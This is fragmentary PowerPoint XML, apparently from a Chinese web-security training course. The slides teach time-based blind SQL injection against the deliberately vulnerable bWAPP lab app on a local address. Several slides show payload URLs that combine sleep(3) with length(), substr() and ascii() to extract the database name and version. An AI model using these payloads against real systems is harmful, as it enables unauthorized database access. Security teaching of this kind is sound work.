              <a:ext cx="4584134" cy="408238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:sp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zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>示例</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="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76E8A090-41A8-5F4D-94BE-7E081B07E5DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D4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626A29F-90EF-2F45-AC22-0DBA4EC90C74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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87130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129881" y="758031"/>
            <a:ext cx="3932237" cy="5341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1" name="矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129881" y="2486302"/>
            <a:ext cx="235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'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="圆角矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3451441" y="3571958"/>
            <a:ext cx="5610895" cy="369332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dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI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92141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2129078" y="88078"/>
            <a:ext cx="6976641" cy="678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注入尝试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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087016" y="1427859"/>
            <a:ext cx="7074561" cy="19306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087015" y="3518424"/>
            <a:ext cx="7074561" cy="18912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3269673" y="5765420"/>
            <a:ext cx="8132858" cy="41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DEA9B66D-47C5-E843-A592-1B986D1E8AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663927" y="2180677"/>
            <a:ext cx="3188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尝试使用错误注入，布尔注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"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C111A2C-D35E-9A43-A06E-F1DADE496720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663926" y="3180406"/>
            <a:ext cx="3188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均无反馈信息（这一点很重要）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"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03AAFDC-A2F4-0641-9265-7A0B9E88F555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663926" y="4210928"/>
            <a:ext cx="2605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尝试其他内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"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E328745B-EF53-0D4D-8BC8-D3B43D778C6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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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4" name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="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E328745B-EF53-0D4D-8BC8-D3B43D778C6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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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144142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2295334" y="115246"/>
            <a:ext cx="6976641" cy="678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时间注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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62193" y="1053786"/>
            <a:ext cx="6622387" cy="20399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193241" y="3307027"/>
            <a:ext cx="10506437" cy="199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4" name="圆角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382895" y="3827708"/>
            <a:ext cx="4316783" cy="475619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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 131" descr="ipd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210514" y="1868157"/>
            <a:ext cx="1752600" cy="1225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圆角矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969172" y="5431149"/>
            <a:ext cx="10522736" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and sleep(3) -- &amp;action=search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6CA1D9F3-6DC7-734A-8013-9BFBA622C58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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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8" name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="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6CA1D9F3-6DC7-734A-8013-9BFBA622C58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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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06998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2175425" y="88078"/>
            <a:ext cx="6976641" cy="678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数据库名字长度获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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175425" y="1178210"/>
            <a:ext cx="8148577" cy="884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由于注入点不能反馈信息，所以不能像前面两个注入方式那样直接简洁地获取数据库信息，需要从侧面一步步拼凑信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279721" y="3191190"/>
            <a:ext cx="11632557" cy="4756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 UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://192.168.0.105/sqli_15.php?title=World War Z' and length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5 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 UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> and sleep(3) -- &amp;action=search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Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34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279721" y="2474617"/>
            <a:ext cx="11632557" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and length(database())=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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4 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 and sleep(3) -- &amp;action=search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016498" y="3924742"/>
            <a:ext cx="8610600" cy="16369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4F7699BC-DD9F-CD49-A658-9F9F0E1A83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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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2" name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="288648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4F7699BC-DD9F-CD49-A658-9F9F0E1A837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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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8868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2004388" y="88078"/>
            <a:ext cx="6976641" cy="678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数据库名字的第一个字母获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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143766" y="1724279"/>
            <a:ext cx="11632557" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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substr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(database(),1,1)=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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‘a'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   and sleep(3) -- &amp;action=search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143766" y="2440852"/>
            <a:ext cx="11632557" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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substr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(database(),1,1)=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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'b'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   and sleep(3) -- &amp;action=search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89182" y="3409408"/>
            <a:ext cx="10217070" cy="19217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15" name="直接箭头连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7627716" y="1035057"/>
            <a:ext cx="982884" cy="689221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BCADF9A-B184-8643-9629-E39A69CE54E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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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6" name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="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DBCADF9A-B184-8643-9629-E39A69CE54E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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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70375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2F4CD337-3BE7-0A4A-98DE-7AA8618CD6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048397" y="4476784"/>
            <a:ext cx="6095206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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>扫码试看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>订阅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t> 安全攻防实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>视频课程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BB5B18B-4632-5B46-8087-CF3F8F6B5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4421" y="1473626"/>
            <a:ext cx="3003158" cy="3003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446018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Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B994AB2-1070-E848-89BB-536BCCFB3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9167" y="5294373"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD723B5E-F49C-42B4-B84C-579B3F105F1D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23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016646" y="88078"/>
            <a:ext cx="6976641" cy="678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数据库版本名称长度获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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162333" y="1449728"/>
            <a:ext cx="11632557" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and length(version())=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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5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 and sleep(3) -- &amp;action=search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162333" y="2374647"/>
            <a:ext cx="11632557" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and length(version())= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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23 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and sleep(3) -- &amp;action=search</a:t>
            </a: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19632" y="3429000"/>
            <a:ext cx="10552735" cy="2051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下箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504967" y="1925347"/>
            <a:ext cx="312516" cy="4493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3CB8214-3979-3A49-A03C-C03C5106D38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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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70" name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="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23CB8214-3979-3A49-A03C-C03C5106D38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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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69422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2115224" y="88078"/>
            <a:ext cx="6976641" cy="678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实际情况</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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59259" y="1230643"/>
            <a:ext cx="9306328" cy="8844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在实际情况中，版本名称不仅只有字母也可能有其他特殊字符，一个一个尝试终究是有遗漏的，而且手工输入时间耗时较久，需要通过程序解决。</a:t>
            </a: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35706" y="2525113"/>
            <a:ext cx="6976641" cy="4594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1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI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0" y="3936114"/>
            <a:ext cx="12192000" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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ascii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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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substr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(database(),1,1))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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98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   and sleep(3) -- &amp;action=search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0" y="3288172"/>
            <a:ext cx="12192000" cy="4756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http://192.168.0.105/sqli_15.php?title=World War Z' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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ascii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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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substr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(database(),1,1))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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1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   and sleep(3) -- &amp;action=search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4876099"/>
            <a:ext cx="12026900" cy="25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96D7D94-0ECC-9E40-B8F8-3C50F391351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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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4" name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="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D96D7D94-0ECC-9E40-B8F8-3C50F391351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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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932156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2040124" y="106210"/>
            <a:ext cx="6976641" cy="678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ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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678224" y="1428181"/>
            <a:ext cx="6835551" cy="44314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圆角矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980130" y="2730217"/>
            <a:ext cx="652264" cy="475619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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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C3AD8B0-B5E1-A54F-97AC-108A5E825E4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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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8" name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId5" imgW="3593160" imgH="288648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0C3AD8B0-B5E1-A54F-97AC-108A5E825E4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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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66064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1998251" y="94299"/>
            <a:ext cx="6976641" cy="674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 err="1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bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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需要登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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13659" y="1374487"/>
            <a:ext cx="6805613" cy="248443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098643" y="3577718"/>
            <a:ext cx="6178957" cy="28973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675087" y="4554105"/>
            <a:ext cx="2027237" cy="944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5A9B415-3269-3D43-B6B3-DE819056EA6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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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42" name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="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E5A9B415-3269-3D43-B6B3-DE819056EA6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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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41560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Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B994AB2-1070-E848-89BB-536BCCFB3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6018" y="5734436"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD723B5E-F49C-42B4-B84C-579B3F105F1D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23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088033" y="100141"/>
            <a:ext cx="6976641" cy="678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程序编写</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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94707" y="1440566"/>
            <a:ext cx="4571903" cy="12899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Python 2.7.9 + </a:t>
            </a:r>
            <a:r>
              <a:rPr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或 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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Python 3.4+ </a:t>
            </a:r>
            <a:r>
              <a:rPr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以上版本都自带 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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pip </a:t>
            </a:r>
            <a:r>
              <a:rPr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工具，如无，单独下载后安装  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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requests</a:t>
            </a:r>
            <a:r>
              <a:rPr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 模块。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill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75814" y="3107162"/>
            <a:ext cx="5057439" cy="321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234323" y="621914"/>
            <a:ext cx="5742445" cy="56141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034121" y="3660270"/>
            <a:ext cx="4482944" cy="2096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5" name="圆角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9504218" y="2779184"/>
            <a:ext cx="1341120" cy="314922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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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9820550" y="4722284"/>
            <a:ext cx="1857908" cy="314922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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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875814" y="5441531"/>
            <a:ext cx="2587822" cy="432795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600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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EB3172DC-CB50-BE4B-BBD0-C7C15289475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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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66" name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId7" imgW="3593160" imgH="2886480" progId="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EB3172DC-CB50-BE4B-BBD0-C7C15289475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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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487548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2007214" y="88078"/>
            <a:ext cx="6976641" cy="678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Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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B8929BB-A284-C34F-A044-9D02CD5A6828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3478110" y="776347"/>
            <a:ext cx="4328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dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://requests.readthedocs.io/en/master/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="手机截图图社交软件的信息&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE82E580-1A9F-3C49-9100-F8AA8FD5DE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713" y="1309921"/>
            <a:ext cx="11118574" cy="5548079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5D719BC-A1C2-4B4C-90C3-89F372BD000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8984" y="180489"/>
          <a:ext cx="1650275" cy="58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90" name="CorelDRAW" r:id="rId6" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId6" imgW="3593160" imgH="288648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45D719BC-A1C2-4B4C-90C3-89F372BD000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8984" y="180489"/>
                        <a:ext cx="1650275" cy="5857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860032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8EA63DA-2AEA-8F40-B1AA-FE830C782EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560043"/>
            <a:ext cx="4401431" cy="1742085"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="4584134" cy="1814399"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879CBAAF-099F-B447-9374-3EB4085EF4C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670299"/>
              <a:ext cx="4584134" cy="408238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:sp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zh-CN" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>04 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>隐蔽的盲注点</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="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76E8A090-41A8-5F4D-94BE-7E081B07E5DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D4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5">
              <a:extLst>
